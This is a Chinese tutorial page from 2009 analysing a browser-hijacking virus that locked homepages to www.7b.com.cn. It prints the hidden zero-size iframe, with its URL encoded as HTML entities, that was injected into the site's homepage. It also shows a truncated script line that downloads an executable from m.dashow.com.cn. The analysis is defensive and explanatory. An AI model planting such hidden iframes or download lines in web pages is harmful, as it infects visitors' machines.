当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客是如何做到锁定用户的浏览器首页

安全基础
网络掩码地址造成的网络访问故障
你知道这些GOOGLE搜索中的技巧吗?
URLzone新型银行木马病毒的工作机理
通过进程判断机器是否有木马病毒
任务管理器不能用该如何恢复?
国际上病毒命名惯例种病毒前缀的含义
利用数字证书保护文档内容的完整性
清空局域网中计算机登陆用户名和密码
防止远程软件盗窃硬盘数据的3种方法
浏览器的自动填表功能让你上网操作更简单
电脑出现错误IP地址解决方法汇总
netmeeting共享灰色不能共享问题解决方法
知己知彼 防范恶意网站骗人伎俩
招商银行网上银行使用方法和UKey说明
Everest软件和鲁大师软件轻松检测系统硬件
宽带路由器设置方法的具体操作
sniffer技术原理及应用(1)
sniffer技术原理及应用(2)
看指示灯排除ADSL故障
DoS攻防简明问答

安全基础 中的 黑客是如何做到锁定用户的浏览器首页


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-19   浏览: 86 ::
收藏到网摘: n/a

  前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

 

  提醒:分析病毒存在一定风险,建议在虚拟机下操作。

  第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。

  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。

  第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的<scrtipt>脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。

  第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。